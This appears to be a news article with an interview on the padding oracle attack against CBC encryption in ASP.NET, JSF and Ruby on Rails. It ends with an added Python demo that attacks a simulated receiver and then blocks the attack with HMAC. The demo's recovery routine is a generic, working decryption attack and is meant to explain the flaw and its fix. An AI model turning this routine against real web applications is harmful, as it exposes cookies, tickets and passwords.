Using a Padding Oracle (PO) attack, a malicious user can decrypt data such as cookies, view state and membership passwords without knowing the key. According to Juliano Rizzo and Thai Duong, the vulnerability affects JavaServer Faces, Ruby on Rails, ASP.NET and other technologies and platforms.
Serge Vaudenay, a professor who leads the Security and Cryptography Laboratory (LASEC) at the Swiss Federal Institute of Technology in Lausanne (EPFL), published the paper “Security Flaws Induced by CBC Padding – Applications to SSL, IPSEC, WTLS...” (PDF) in 2002, showing that the padding schemes used to turn block ciphers into variable-input-length encryption schemes can introduce major security flaws.
When a message padded according to RFC 2040 is decrypted, the receiver must determine what the padding is, check that it is correct and then discard it. RFC 2040 does not, however, specify what the receiver should do if the padding is not correct. Vaudenay concludes:
Although the receiver should not tell the sender that the padding is not correct, it is meaningful that non-processing of a decrypted message ultimately leaks this bit of information.
This leads to an attack that uses an oracle for which any block sequence tells if the padding of the corresponding CBC-decrypted sequence is correct according to the above algorithm [RFC 2040]. The attack works within a complexity of O(NbW) in order to decrypt the message where W is the number of possible words (typically W = 256).
According to Vaudenay, this weakness can affect protocols such as SSL, IPSEC, WTLS and SSH, making it possible to decrypt data without possessing the secret key. He demonstrates how the attack works and suggests a possible fix.
Building on Vaudenay’s paper, Juliano Rizzo and Thai Duong, two software engineers specializing in security, wrote a new paper, “Practical Padding Oracle Attacks” (PDF), published on May 25, 2010. The authors claim the Padding Oracle (PO) vulnerability is present in widespread technologies such as JavaServer Faces (JSF), Ruby on Rails and OWASP ESAPI. They have created and published a tool called POET (Padding Oracle Exploitation Tool) that detects whether a JSF website is vulnerable to the PO attack.
Rizzo and Duong presented the paper at the ekoparty Security Conference on September 17th, revealing that ASP.NET and SharePoint are vulnerable to PO attacks, though they did not release a POET version for ASP.NET. They say that using PO one can “decrypt cookies, view states, form authentication tickets, membership password, user data, and anything else encrypted using the framework's API!” Their disclosure triggered a major reaction from Microsoft: Scott Guthrie, Corporate VP at Microsoft, and one of his teams worked around the clock on a patch. After 10 days Microsoft released an out-of-band security update for all .NET versions on all platforms, an update that also appeared on Windows Update. The scale of Microsoft’s response shows how serious the threat is, and it raises the alarm that many other websites may be vulnerable.
InfoQ talked to Juliano Rizzo about Padding Oracle, POET and ASP.NET.
InfoQ: Have you discovered other platforms besides JSF, Ruby on Rails and ASP.NET that are vulnerable?
JR: We have not looked in detail at any other platform yet, but we are sure there are more platforms, applications and sites vulnerable to the same attack.
InfoQ: What is POET?
JR: The version of POET released five months ago is a proof of concept focused on JSF; we will release a more generic version in the future. We also plan to write a paper about the details of the ASP.NET vulnerability.
We published POET to test JSF sites after Blackhat Europe 2010. This tool can be used to detect the vulnerability but not to get access to systems automatically (demo).
InfoQ: Why has there been so much commotion around ASP.NET lately, and nothing related to JSF and Ruby on Rails, if they are vulnerable too?
JR: ASP.NET is more popular than JSF and Ruby on Rails, because approximately 25% of the internet sites use ASP.NET.
InfoQ: How can a platform be tested to see if it is vulnerable or not?
JR: Both source code auditing and black-box testing can be used to check if an application is vulnerable. At the moment there isn't any tool available to reliably detect the vulnerability in a generic way.
InfoQ: What do you recommend to platform makers and website admins to do to make sure they are protected from a Padding Oracle attack?
JR: First, there isn't a very good reason to send encrypted data to the web client so developers should find alternative solutions if they can. If encrypted data is sent to the client, the integrity of the ciphertext must be protected to avoid the padding oracle attack or any other attack based on modifying the ciphertext.
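The following Python script is an added example, not code from this article, from Vaudenay’s paper or from POET. It shows both the attack Vaudenay describes above (a receiver that behaves differently when the RFC 2040 padding is wrong, used as an oracle to recover the plaintext one byte at a time with at most W = 256 queries per byte, and no key) and the fix Rizzo recommends in his last answer (authenticate the ciphertext, here with HMAC in encrypt-then-MAC order, so that a modified ciphertext is rejected before any padding is examined). The block cipher is a stand-in, a four-round Feistel network keyed with HMAC-SHA256, assumed here only so the script runs on the standard library; the attack never looks inside it, which is the point. The sample plaintext, keys, and function names (`make_receiver`, `recover_block`, `attack`, `demo`) are constructed for the example.

```python
# Added example, not code from the article, Vaudenay's paper or POET. The block cipher is a
# stand-in (4-round Feistel over HMAC-SHA256) assumed so the script runs on the stdlib only.
import hashlib
import hmac
import os

BLOCK = 16
SECRET = b"membership-password=hunter2"   # constructed sample plaintext

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK            # RFC 2040 / PKCS#7: n bytes of value n
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")      # this distinguishable failure is the oracle
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def make_receiver(enc_key, mac_key=None):
    """Without mac_key: the vulnerable padding oracle.  With it: encrypt-then-MAC,
    so a modified (iv, ct) fails the tag check before any padding is examined."""
    def accept(iv, ct, tag=b""):
        if mac_key is not None:
            good = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
            if not hmac.compare_digest(tag, good):
                return False
        try:
            unpad(cbc_decrypt(enc_key, iv, ct))
            return True
        except ValueError:
            return False
    return accept

def recover_block(oracle, prev, cur):
    """Recover one plaintext block with no key, or None if the oracle never accepts."""
    inter = bytearray(BLOCK)                 # I = block_decrypt(key, cur), learned byte by byte
    for j in range(BLOCK - 1, -1, -1):
        p = BLOCK - j                        # padding value we force at positions j..15
        forged = bytearray(os.urandom(BLOCK))
        for k in range(j + 1, BLOCK):
            forged[k] = inter[k] ^ p         # known bytes of I now decrypt to p
        for g in range(256):                 # at most W = 256 queries per byte
            forged[j] = g
            if not oracle(bytes(forged), cur):
                continue
            if j == BLOCK - 1:               # p == 1 may be a false hit (e.g. ..02 02):
                forged[j - 1] ^= 0xFF        # a genuine 01 pad survives a change to byte 14
                if not oracle(bytes(forged), cur):
                    continue
            inter[j] = g ^ p
            break
        else:
            return None
    return _xor(inter, prev)                 # P = I xor previous ciphertext block

def attack(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    found = [recover_block(oracle, p, c) for p, c in zip(blocks, blocks[1:])]
    return None if None in found else unpad(b"".join(found))

def demo():
    enc_key, mac_key, iv = os.urandom(16), os.urandom(16), os.urandom(BLOCK)
    ct = cbc_encrypt(enc_key, iv, pad(SECRET))
    leaked = attack(make_receiver(enc_key), iv, ct)          # == SECRET, without the key
    tag = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    auth = make_receiver(enc_key, mac_key)                    # attacker replays the real tag
    blocked = attack(lambda i, c: auth(i, c, tag), iv, ct)   # None: every forgery rejected
    return leaked, blocked
```

`demo()` returns the recovered plaintext from the unauthenticated receiver and `None` from the authenticated one. Two details matter in practice: the oracle need not be an explicit error message, since a different response time, status code or page is enough; and the tag must be checked with a constant-time comparison and cover the IV as well as the ciphertext, otherwise the first block can still be manipulated.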
Related resources: Important: ASP.NET Security Vulnerability, Frequently Asked Questions about the ASP.NET Security Vulnerability, Update on ASP.NET Vulnerability, ASP.NET Security Update Shipping Tuesday, Sept 28th, ASP.NET Security Update Now Available, ASP.NET Security Fix Now on Windows Update, Microsoft Security Bulletin MS10-070 – Important, Security Advisory 2416728 (Vulnerability in ASP.NET) and SharePoint, More on the asp.net padding oracle vulnerability and POET attacks.